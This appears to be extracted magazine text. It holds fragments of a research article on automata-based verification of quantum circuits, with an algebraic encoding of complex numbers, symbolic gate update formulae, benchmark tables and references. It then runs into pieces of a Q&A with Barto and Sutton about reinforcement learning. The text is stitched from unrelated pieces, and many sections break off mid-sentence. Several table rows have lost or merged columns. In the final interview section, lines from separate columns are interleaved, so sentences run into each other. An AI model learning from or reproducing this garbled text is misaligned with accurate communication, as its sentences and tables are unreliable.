Representation of complex numbers. To achieve accuracy with no loss of precision, in this paper, when working with ℂ, we consider only a subset of complex numbers that can be expressed by the following algebraic encoding proposed in Zulehner and Wille26 (and also used in Tsai et al.21):

(1/√2)^k · (a + bω + cω² + dω³),   (5)

where a, b, c, d, k ∈ ℤ and ω = e^{iπ/4}, the unit vector that makes an angle of 45° with the positive real axis in the complex plane. A complex number is then represented by a five-tuple (a, b, c, d, k). Although the considered set of complex numbers is only a small subset of ℂ (it is countable, while the set ℂ is uncountable), the subset is already sufficient to describe a set of quantum gates that can implement universal quantum computation (cf. Section 4 for more details). The algebraic representation also allows efficient encoding of some operations. For example, because ω⁴ = −1, the multiplication of (a, b, c, d, k) by ω can be carried out by a simple right circular shift of the first four entries, taking the opposite number for the first entry, namely (−d, a, b, c, k), which represents the complex number (1/√2)^k · (−d + aω + bω² + cω³). In the rest of the paper, we use 0 and 1 to denote the tuples for zero and one—that is, (0, 0, 0, 0, 0) and (1, 0, 0, 0, 0), respectively. Using such an encoding, we represent quantum states by functions of the form T : {0, 1}^n → ℤ⁵.

Qubit measurement. After executing a quantum circuit, one can measure the final quantum state in the computational basis. The probability that the qubit xj […] after the measurement, amplitudes of states with xj = |1⟩ become 0 and amplitudes of states with xj = |0⟩ are normalized using 1/√(Prob[xj = |0⟩]).

^a We abuse notation and sometimes identify a binary string with its (unsigned) integer value in the most-significant-bit-first encoding, for example, the string 0101 with the number 5.
^b Observe that to satisfy the requirement for the amplitudes of quantum states, it must be a unit vector.
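The five-tuple encoding and its shift rule can be checked directly. The sketch below is ours (function names are illustrative), implementing the representation of Equation (5) and the multiplication by ω described above:

```python
import cmath
import math

OMEGA = cmath.exp(1j * math.pi / 4)   # omega = e^{i*pi/4}

def to_complex(t):
    """Decode the five-tuple (a, b, c, d, k) to the complex number
    (1/sqrt(2))^k * (a + b*omega + c*omega^2 + d*omega^3)."""
    a, b, c, d, k = t
    return (1 / math.sqrt(2)) ** k * (a + b * OMEGA + c * OMEGA**2 + d * OMEGA**3)

def times_omega(t):
    """Multiply by omega: right circular shift of (a, b, c, d) with the
    wrapped entry negated, using omega^4 = -1."""
    a, b, c, d, k = t
    return (-d, a, b, c, k)

ONE = (1, 0, 0, 0, 0)
t = ONE
for _ in range(8):
    t = times_omega(t)
assert t == ONE                       # omega^8 = 1

x = (3, -1, 2, 5, 4)
assert cmath.isclose(to_complex(times_omega(x)), to_complex(x) * OMEGA)
```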
term over Σ. For instance, T = f(f(c1, c2), g(f(c2, c3), c1)), shown below, represents a binary tree. The set of nodes of a binary tree T, denoted as NT, is defined inductively as a set of words over {0, 1}: for every constant symbol c, we define Nc = {ϵ}, and for every binary symbol f, we define Nf(T0,T1) = {ϵ} ∪ {a.w | a ∈ {0, 1} ∧ w ∈ NTa}, where ϵ is the empty word and '.' is concatenation. Each binary tree T is associated with a labeling function LT : {0, 1}* → Σ, which maps a node of T to its label in Σ.

          f
        /   \
       f     g
      / \   / \
    c1  c2 f   c1
          / \
        c2   c3

Tree automata. We focus on tree automata on binary trees and refer the interested reader to Comon13 for a general definition. A (nondeterministic finite) tree automaton (TA) is a tuple 𝒜 = ⟨Q, Σ, Δ, ℛ⟩, where Q is a finite set of states, Σ is a ranked alphabet, ℛ ⊆ Q is the set of root states, and Δ = Δint ∪ Δleaf is a set of tree transitions consisting of the set Δint of internal transitions of the form q →f (q0, q1) (for a binary symbol f) and the set Δleaf of leaf transitions of the form q →c () (for a constant symbol c), for q, q0, q1 ∈ Q. We can conveniently describe TAs by providing only the set of root states ℛ and the set of transitions Δ; the alphabet and states are implicitly defined as those that appear in Δ. For example, Δ = {q →x1 (q1, q0), q0 →0 (), q1 →x1 (q0, q1), q0 →1 ()} implies that Σ = {x1, 0, 1} and Q = {q, q0, q1}.

Run and language. A run of 𝒜 on a tree T is another tree ρ labeled with Q such that (i) T and ρ have the same set of nodes, that is, NT = Nρ; (ii) for all leaf nodes u ∈ NT, we have Lρ(u) →LT(u) () ∈ Δ; and (iii) for all non-leaf nodes u ∈ NT, we have the transitions Lρ(u) →LT(u) (Lρ(0.u), Lρ(1.u)) ∈ Δ. The run ρ is accepting if Lρ(ϵ) ∈ ℛ. The language ℒ(𝒜) of 𝒜 is the set of trees accepted by 𝒜, that is, ℒ(𝒜) = {T | there exists an accepting run of 𝒜 over T}.

Among others, 𝒜bas3 accepts the previous tree (Ex. 1 figure, left) with the run (Ex. 1 figure, right). Observe that all tree nodes satisfy the requirement of a valid run: for example, the leaf nodes match leaf transitions such as q30 →0 (), the node 01 corresponds to the transition q20 →x3 (q30, q30), ϵ to q →x1 (q21, q20), and so on. In 𝒜bas3, we use states named qn0 to denote that only subtrees with all zeros (0) in their leaves can be generated from them, and states named qn1 to denote that only subtrees with a single 1 in their leaves can be generated from them. Intuitively, the TA accepts all trees of height 3 with exactly one 1 leaf and all other leaves 0 (in our encoding of quantum states, this might correspond to saying that 𝒜bas3 encodes an arbitrary computational basis state of a three-qubit system).

3. ENCODING SETS OF QUANTUM STATES WITH TREE AUTOMATA

Observe that we can use (perfect) binary trees to encode functions {0, 1}^n → ℤ^5, for example, the function representation of quantum states. For instance, the tree given by the term

x1(x2(x3(1, 0), x3(0, 0)), x2(x3(0, 0), x3(0, 0)))    (6)

encodes the function T where T(000) = 1 and T(i) = 0 for all i ∈ {0, 1}^3 \ {000}. Since TAs can concisely represent sets of binary trees, they can also encode sets of quantum states.

Example 2 (Concise representation by TAs). Here we consider the set of n-qubit quantum states Sn = {|i⟩ | i ∈ {0, 1}^n}, that is, the set of all basis states. Note that |Sn| = 2^n, which is exponential. Representing all possible basis states naively would require storing 2^{2n} complex numbers. TAs can, however, represent such a set much more efficiently. For the case when n = 3, the set S3 can be represented by the TA 𝒜bas3 from Example 1 with 3n + 1 transitions (that is, linear-sized in the number of qubits). The TA 𝒜bas3 can be generalized to encode the set of all n-qubit states Qn = {|i⟩ | i ∈ {0, 1}^n} for each n ∈ ℕ by setting the transitions to
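In the same spirit, the acceptance check and a linear-size basis-state TA can be sketched as follows. This is our own toy rendering: the tuple encodings, state names, and exact transition count are ours, not necessarily those of the paper's 𝒜bas3:

```python
# Bottom-up acceptance check for a nondeterministic tree automaton on
# binary trees. Trees are nested tuples (symbol, left, right) or a leaf
# symbol string; internal transitions q -f-> (q0, q1) are 4-tuples and
# leaf transitions q -c-> () are pairs.
def states_at(tree, internal, leaf):
    if isinstance(tree, str):                      # leaf labeled c
        return {q for (q, c) in leaf if c == tree}
    sym, l, r = tree
    ls, rs = states_at(l, internal, leaf), states_at(r, internal, leaf)
    return {q for (q, f, q0, q1) in internal
            if f == sym and q0 in ls and q1 in rs}

def accepts(tree, internal, leaf, roots):
    # A tree is in the language iff some root state labels its root.
    return bool(states_at(tree, internal, leaf) & roots)

def basis_ta(n):
    # TA whose language is the set of trees encoding all n-qubit basis
    # states: qi1 generates subtrees with exactly one 1 leaf, qi0 only
    # all-zero subtrees.
    internal = set()
    for i in range(1, n + 1):
        x = "x%d" % i
        internal |= {("q%d1" % i, x, "q%d1" % (i + 1), "q%d0" % (i + 1)),
                     ("q%d1" % i, x, "q%d0" % (i + 1), "q%d1" % (i + 1)),
                     ("q%d0" % i, x, "q%d0" % (i + 1), "q%d0" % (i + 1))}
    leaf = {("q%d1" % (n + 1), "1"), ("q%d0" % (n + 1), "0")}
    return internal, leaf, {"q11"}

# Tree of Equation 6: amplitude 1 exactly at assignment 000.
t6 = ("x1", ("x2", ("x3", "1", "0"), ("x3", "0", "0")),
            ("x2", ("x3", "0", "0"), ("x3", "0", "0")))
```

The number of transitions grows linearly in n, while the language contains 2^n trees, which is the point of Example 2.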
gates on this representation. When quantum states are represented as vectors, gates are represented as matrices and gate operations are matrix multiplications. When states are represented as binary trees, we need a new representation for quantum gates and their operations. Inspired by the work of Tsai et al.,21 we introduce symbolic update formulae, which describe how a gate transforms a tree representing a quantum state. Later, we will lift the tree update operation to a set of trees encoded in a TA.

We use the algebraic representation of quantum states from Equation 5 also for their symbolic handling. For instance, consider a system with qubits x1, x2 and its state

T = c00 · |00⟩ + c01 · |01⟩ + c10 · |10⟩ + c11 · |11⟩    (7)

for c00, c01, c10, c11 ∈ ℤ^5, four complex numbers represented in the algebraic way. The result of applying the X gate (the quantum version of the NOT gate) on qubit x1 (cf. Figure 2a)—denoted as X1—is (c10, c11, c00, c01)^T (cf. Equation 4).

Figure 2. (a) The X1 gate applied to qubit x1. (b) Matrix of the X gate: X = (0 1; 1 0). (c) The CNOT12 gate with target qubit x1 and control qubit x2. (d) Matrix of the CNOT12 gate: CNOT = (1 0 0 0; 0 1 0 0; 0 0 0 1; 0 0 1 0).

Equipped with the operators, we can now proceed to express the semantics of X1 symbolically. Let us first look at the first two summands on the right-hand side of Equation 8: T0 = c10 · |00⟩ + c11 · |01⟩. These summands can be obtained by manipulating the input function T in the following way:

T0 = Rx̄1(Px1(T)).    (9)

When we view T as a tree, the operation Px1(T) essentially copies the right subtree of every x1-node to its left subtree, and Rx̄1(Px1(T)) makes all leaves in every right subtree of Px1(T)'s x1-nodes zero. This would give us

The sum consists of the following two summands:
˲ The summand Rx̄c(T) says that when the control qubit is 0, the values of all qubits stay the same.
˲ The summand Rxc(Rx̄t(Pxt(T)) + Rxt(Px̄t(T))) handles the case when xc is 1. In such a case, we apply the X gate on xt (observe that the inner term is the update formula of Xt in Equation 13).
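The projection and restriction operators, and the update formulae for X and CNOT built from them, can be mirrored on the function representation. This is a sketch of ours on the dict encoding; qubit indices and helper names are our own:

```python
def proj(T, j, val):
    # P operator: overwrite qubit j with val before lookup, i.e., copy
    # the subtree of the x_j = val branch onto both branches.
    return {b: T[b[:j] + val + b[j + 1:]] for b in T}

def restrict(T, j, val):
    # R operator: keep amplitudes where x_j = val, zero out the rest.
    return {b: (T[b] if b[j] == val else 0) for b in T}

def x_gate(T, j):
    # Update formula of X_j:  R_{x̄j}(P_{xj}(T)) + R_{xj}(P_{x̄j}(T)).
    t0 = restrict(proj(T, j, "1"), j, "0")
    t1 = restrict(proj(T, j, "0"), j, "1")
    return {b: t0[b] + t1[b] for b in T}

def cnot_gate(T, c, t):
    # Update formula:  R_{x̄c}(T) + R_{xc}(X-update of x_t), i.e., when
    # the control qubit is 0 nothing changes; when it is 1, X hits x_t.
    term1 = restrict(T, c, "0")
    term2 = restrict(x_gate(T, t), c, "1")
    return {b: term1[b] + term2[b] for b in T}

# State of Equation 7 with c00..c11 = 1..4.
T = {"00": 1, "01": 2, "10": 3, "11": 4}
```

On this T, x_gate on qubit x1 yields the permuted amplitudes (c10, c11, c00, c01) exactly as Equation 4 prescribes.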
…that xc and x′c are the gate's control qubits (if they exist) and that the subscript t denotes the target qubit xt (e.g., Gc,c′,t).

We note that the supported set of gates is much larger than is required to achieve (approximate) universal quantum computation (for which it suffices to have, e.g., (i) Clifford gates (H, S, and CNOT) and T, or (ii) Toffoli and H).

Theorem 1. The symbolic update formulae in Table 1 are correct (w.r.t. the standard semantics of quantum gates).

Algorithm 1 (excerpt):

    ∆′ = {s →xk (p, q) | s →xk (p, q) ∈ ∆int ∧ k ≠ t} ∪
         {s →xk (p, q′) | s →xk (p, q) ∈ ∆int ∧ k = t}
    8   else Ah := A;                  // when Ut = Xt
    9   assume Ah = ⟨Qh, Σ, ∆h, R⟩;
    10  if Ut ∈ {Xt, Yt} then         // need swapping
    11      AR := ⟨Qh, Σ, ∆R, R⟩, where
    12      ∆R = {s →xk (p, q) | s →xk (p, q) ∈ ∆hint ∧ k ≠ t} ∪
                 {s →xk (q, p) | s →xk (p, q) ∈ ∆hint ∧ k = t} ∪
                 {s →c () | s →c () ∈ ∆hleaf}
    13  else AR := Ah;
    14  return AR;

A note on expressivity. The expressivity of our framework is affected by the following factors:

1. Algebraic complex number representation (a, b, c, d, k): This representation can arbitrarily closely approximate any complex number: when b = d = 0, the quintuple (a, 0, c, 0, k) represents the number (1/√2)^k (a + ic). Then any complex number can be approximated arbitrarily closely by picking suitable a, c, and k.

2. Supported quantum gates: We covered all standard quantum gates supported in modern quantum computers except parameterized rotation gates performing rotations by 2π/2^k. From the Solovay–Kitaev theorem,15 these gates can be approximated with an error rate ϵ using 𝒪(log^3.97(1/ϵ))-many gates that we support.

3. Tree automata structure: We use non-deterministic transitions of tree automata to represent a set of trees compactly. Nevertheless, we can currently encode only a finite set of states. Hence, we cannot express, for example, all quantum states where the amplitudes of |10⟩ and |01⟩ are the same.
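As a concrete illustration of this algebraic encoding (a sketch of ours; the function name is our own, and we assume ω = e^{iπ/4}, as the identity ω² = i used in the text requires):

```python
import cmath
import math

# (a, b, c, d, k) encodes (1/sqrt(2))^k * (a + b*w + c*w^2 + d*w^3),
# where w = e^{i*pi/4}. Since w^2 = i, the quintuple (a, 0, c, 0, k)
# yields (1/sqrt(2))^k * (a + c*i), as stated in point 1 above.
def to_complex(a, b, c, d, k):
    w = cmath.exp(1j * math.pi / 4)
    return (1 / math.sqrt(2)) ** k * (a + b * w + c * w ** 2 + d * w ** 3)
```

Because a, b, c, d range over all integers and k over all naturals, the represented values form a dense subset of ℂ, which is what makes the approximation claim work.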
5. PERMUTATION-BASED ENCODING OF QUANTUM GATES

…from Table 1—projection Pxk(T), restriction Rxk(T), multiplication, and the binary operation ±—and then compose them to get the desired gate semantics. The update formulae in Table 1 are always of the form term1 ± term2. For example, for the Xt gate, term1 = Rxt(Px̄t(T)) and term2 = Rx̄t(Pxt(T)). Our idea is to first construct TAs 𝒜term1 and 𝒜term2, recognizing the quantum states of term1 and term2, and then combine them using the binary operation ± to produce a TA recognizing the quantum states of term1 ± term2. The TAs 𝒜term1, 𝒜term2 would be constructed using TA versions of basic operations. We refer the reader to the original paper11 for further details of the concrete TA constructions.

…formulae scale the left and right subtrees of T with scalars a0 and a1, respectively. The construction of the TA representing the result of the operation (given in Algorithm 1) can be done by (1) making one primed copy 𝒜1 of 𝒜 (that is, a copy where every state q is renamed to q′, with properly modified transitions and root states) whose leaf labels are multiplied with a1 (Lines 3–5); (2) multiplying all leaf labels of 𝒜 with a0 (Lines 6–7); and (3) updating all xt-labeled transitions s →xt (p, q) to s →xt (p, q′), that is, for the right child, jumping to the primed version (Line 7). The case of Yt is similar, but we need both constant scaling (Lines 1–7) and swapping (Lines 10–12), the left-hand-side and right-hand-side scalars being ω² and −ω², respectively.

…primed version here (cf. 𝒜′1 at Line 4). We then update all xc-labeled transitions s →xc (p, q) to s →xc (p, q′), that is, jump to the primed version in the right subtree.

Theorem 4. ℒ(U(𝒜)) = {U(T) | T ∈ ℒ(𝒜)}, for U ∈ {CNOTct, CZct, Toffolicc′t}.

…the time taken by Feynman2 to check the equivalence of the circuits with themselves. Although checking equivalence of quantum circuits is a harder problem than what we are solving (so the results cannot be used for direct comparison with AutoQ), we include these results to give an idea about the hardness of the circuits for path-sum-based approaches. We ran this experiment on a benchmark composed of
Table 2. Verification of quantum circuits. Here, n denotes the parameter value for the circuit, #q denotes the number of qubits, and #G denotes the number of gates in the circuit. For AutoQ, the columns "before" and "after" have the format "states (transitions)," denoting the number of states and transitions in the TA of the pre-condition and of the output of our analysis, respectively. The column "analysis" contains the time it took AutoQ to derive the TA for the output states, and = denotes the time it took Vata to test equivalence. The timeout was 12 min. We use colors to distinguish the best result in each row and timeouts.
BV
95  96  241  193 (193)  193 (193)  6.0s  0.0s  193 (193)  193 (193)  7.1s  0.0s  0.0s  equal  0.5s
96  97  243  195 (195)  195 (195)  5.9s  0.0s  195 (195)  195 (195)  7.1s  0.0s  0.0s  equal  0.5s
97  98  246  197 (197)  197 (197)  6.3s  0.0s  197 (197)  197 (197)  7.4s  0.0s  0.0s  equal  0.6s
98  99  248  199 (199)  199 (199)  6.5s  0.0s  199 (199)  199 (199)  7.7s  0.0s  0.0s  equal  0.6s
99  100 251  201 (201)  201 (201)  6.7s  0.0s  201 (201)  201 (201)  7.8s  0.0s  0.0s  equal  0.6s

Grover-Sing
12  24  5,215    49 (49)  71 (71)    11s     0.0s  49 (49)  71 (71)   49s    0.0s  2.8s   timeout
14  28  12,217   57 (57)  83 (83)    31s     0.0s  57 (57)  83 (83)   2m26s  0.0s  18s    timeout
16  32  28,159   65 (65)  95 (95)    1m29s   0.0s  65 (65)  95 (95)   6m59s  0.0s  1m41s  timeout
18  36  63,537   73 (73)  107 (107)  4m1s    0.0s  timeout  9m27s  timeout
20  40  141,527  81 (81)  119 (119)  10m56s  0.0s  timeout  timeout  timeout

MCToffoli
8   16  15  33 (42)  104 (149)  0.0s  0.0s  33 (42)  404 (915)       2.8s   0.0s  1.6s  equal  0.0s
10  20  19  41 (52)  150 (216)  0.0s  0.0s  41 (52)  1,560 (3,607)   27s    0.0s  6.1s  equal  0.1s
12  24  23  49 (62)  204 (295)  0.0s  0.0s  49 (62)  6,172 (14,363)  6m48s  0.1s  25s   equal  0.1s
14  28  27  57 (72)  266 (386)  0.1s  0.0s  timeout  1m40s  equal  0.1s
16  32  31  65 (82)  336 (489)  0.2s  0.0s  timeout  timeout  equal  0.2s

Grover-All
6   18  357    37 (43)  252 (315)      3.3s   0.0s  37 (43)  510 (573)      12s     0.0s  1.7s  timeout
7   21  552    43 (50)  481 (608)      10s    0.0s  43 (50)  1,123 (1,250)  42s     0.0s  5.4s  timeout
8   24  939    49 (57)  934 (1,189)    39s    0.1s  49 (57)  2,472 (2,727)  2m40s   0.0s  26s   timeout
9   27  1,492  55 (64)  1,835 (2,346)  2m17s  0.4s  55 (64)  5,421 (5,932)  10m13s  0.1s  2m5s  timeout
10  30  2,433  61 (71)  3,632 (4,655)  9m48s  2.1s  timeout  11m31s  timeout
evaluated the ability of the tools to determine that two quantum circuits are non-equivalent (this is to simulate the use case of verifying the output of an optimizer). We took circuits from the benchmarks FeynmanBench, Random, and RevLib, and for each circuit, we created a copy and injected an artificial bug (one additional randomly selected gate at a random location). Then we ran the tools and let them check circuit equivalence; for AutoQ, we let it compute two TAs representing the sets of output states of both circuits for the given set of input states and then checked their language equivalence with Vata.18

Our strategy for finding bugs with AutoQ (we used the Hybrid setting) was the following: We started with a TA representing a single basis state (that is, a TA with no top-down nondeterminism) and gradually added more nondeterministic transitions into the TA (in each iteration, one randomly chosen transition), making it represent a larger set of states, running the analysis for each of the TAs until we found the bug. This proved to be a successful strategy, since running the analysis with an input TA representing, for example, all possible basis states might be too challenging (generally speaking, the larger the TA representing the set of states, the slower the analysis).

The results we obtained show that our approach to hunting for bugs in quantum circuits is beneficial, particularly for larger circuits, where equivalence checkers do not scale. For such cases, AutoQ can still find bugs using a weaker specification. For instance, AutoQ was able to find bugs in some large-scale instances from RevLib with hundreds of qubits, where both Feynman and Qcec fail (see11 for more details).

8. CONCLUSION
We presented a foundational framework for automata-based verification of quantum circuits, demonstrating its effectiveness through empirical studies. We believe applying automata to quantum verification establishes a valuable bridge between quantum and classical verification approaches, with the potential to adapt many classical verification techniques to quantum settings—for instance, by replacing constant tree leaf values with symbolic variables10 and tracking the symbolic values in a way similar to symbolic execution. This allows the verification of properties such as whether the probability of finding a solution exceeds 90% or increases over time. We also extended the model's applicability from quantum circuits to quantum programs9 based on a classical deductive program verification approach.

Note that TAs allow the representation of infinite languages, yet we use them only for finite ones, which might make the model seem overly expressive. We, however, stick to TAs for the following two reasons: (i) there is an existing rich tool-
References
1. Abdulla, P.A. et al. Verifying quantum circuits with level-synchronized tree automata. Proc. ACM Program. Lang. 9, POPL (2025).
2. Amy, M. Towards large-scale functional verification of universal quantum circuits. In Proc. 15th Intern. Conf. on Quantum Physics and Logic, Selinger, P. and Chiribella, G. (eds.) (2018), 1–21.
3. Arute, F. et al. Quantum supremacy using a programmable superconducting processor. Nature 574, 7779 (Oct. 2019), 505–510.
4. Bernstein, E. and Vazirani, U.V. Quantum complexity theory. In Proc. 25th Annual ACM Symp. on Theory of Computing, ACM (1993).
5. Bouajjani, A., Jonsson, B., Nilsson, M., and Touili, T. Regular model checking. In Computer Aided Verification, 12th Intern. Conf., Emerson, E.A. and Sistla, A.P. (eds.), Springer (2000), 403–418.
6. Burgholzer, L., Kueng, R., and Wille, R. Random stimuli generation for the verification of quantum circuits. In Proc. 26th Asia and South Pacific Design Automation Conf., ACM (2021), 767–772.
7. Burgholzer, L. and Wille, R. Advanced equivalence checking for quantum circuits. IEEE Trans. on Computer-Aided Design of Integrated Circuits and Systems 40, 9 (2020), 1810–1824.
8. Chen, T.-F., Jiang, J.-H.R., and Hsieh, M.-H. Partial equivalence checking of quantum circuits. In Proc. 2022 IEEE Intern. Conf. on Quantum Computing and Engineering (2022), 594–604.
9. Chen, Y. et al. AutoQ 2.0: From verification of quantum circuits to verification of quantum programs (technical report). (2024); https://arxiv.org/abs/2411.09121.
10. Chen, Y. et al. AutoQ: An automata-based quantum circuit verifier. In Proc. 35th Intern. Conf. Computer Aided Verification, Springer (2023), 139–153.
11. Chen, Y. et al. An automata-based framework for verification and bug hunting in quantum circuits. Proc. ACM Program. Lang. 7, PLDI (2023), 1218–1243.
12. Coecke, B. and Duncan, R. Interacting quantum observables: categorical algebra and diagrammatics. New J. of Physics 13, 4 (Apr. 2011), 043016.

This work is licensed under a Creative Commons Attribution International 4.0 License.

© 2025 Copyright held by the owner/author(s).
last byte
Barto: This is the connection to search. Trial and error is search. The system searches for something that yields a high evaluation.

Sutton: You search, and then you associate what you found.

Let's move on to temporal difference

…and all models will be wrong, as is the famous quote, but some of them are useful. The word "model" suggests it might be a simple thing, like a bunch of probabilities or differential equations. Really, it's what we mean when we say "knowledge." Knowledge of the world—how you represent and organize and learn

…large language models. They're used in Reinforcement Learning from Human Feedback (RLHF). They're used in the runtime processes that are mistakenly called "reasoning."

Barto: On the flip side, we have always

…going to continue to happen, and I want to be a part of that.

Leah Hoffmann is a technology writer located in Piermont, NY.

© 2025 ACM 0001-0782/25/6
Q&A
Developing the Foundations
of Reinforcement Learning
2024 ACM A.M. Turing Award recipients Andrew G. Barto and Richard S. Sutton on learning from
experience, temporal difference learning, and reinforcement learning as “a collection of tools.”
THE EXAMPLES ARE nothing if not relatable: preparing breakfast, or playing a
game of chess or tic-tac-toe. Yet the idea
of learning from the environment and
taking steps that progress toward a goal
apparently was under-studied when
ACM A.M. Turing Award recipients An-
drew G. Barto and Richard S. Sutton
took on the topic in the late 1970s. Even-
tually, their research led to the creation
of reinforcement learning algorithms
that sought not to recognize patterns
but maximize rewards. We spoke with
Barto and Sutton about how it all un-
folded, and what’s next for the tech-
niques that are so celebrated for their
success in AlphaGo and AlphaZero.

Andrew G. Barto and Richard S. Sutton
PHOTOGRAPH OF ANDREW G. BARTO BY JASON M. GROW; PHOTOGRAPH OF RICHARD S. SUTTON BY RICHARD MORGENSTEIN
Let’s start with the earliest days of your sense, and we continued on that line of of Massachusetts for graduate school.
collaboration. Andy, you were a postdoc research for a long time. The insight Harry had was that machine
at a group that was founded by Michael Sutton: Michael was a key player, but learning had lost the idea of agents that
Arbib at the University of Massachusetts the person who brought us together could learn; it had become pattern rec-
Amherst, known informally as the Brain is Harry Klopf. I found his work in the ognition. He was disappointed in that,
Theory Group. Rich, you were Andy’s library at Stanford (University), and I so he got the Air Force to fund the pro-
first Ph.D. student. You were tasked with wrote him a letter and met him, and gram at the University of Massachusetts.
exploring a hypothesis that neurons he suggested I apply to the University Barto: Harry felt that the idea of ho-
behaved like hedonists—that they were meostasis, which dominated thinking
self-interested agents working to maxi- about biological systems at the time,
mize pleasure and minimize pain. “Homeostatis is was not correct. Homeostasis is keeping
Barto: It was a kind of a crazy idea, things the same, and that’s just not what
because in those days, neurons were keeping things the intelligence is about. It’s about maxi-
treated as logic gates. Our job was to see same, and that’s just mizing, it’s about improving—
if the hypothesis was worth pursuing. Sutton: It’s about optimizing.
Rich joined as a graduate student about not what intelligence Barto: Interestingly, Marvin Minsky
a year after the project started, and we is about.” made the same comment in something
had five years where I didn’t have to he wrote, that homeostatic systems are
teach, Rich was taking classes, and the really good at doing nothing.
principal investigators left us alone. So
we had the freedom to explore the his- Perhaps we should take a moment to
tory of this idea and whether it made review some [C O NTINUED O N P. 94]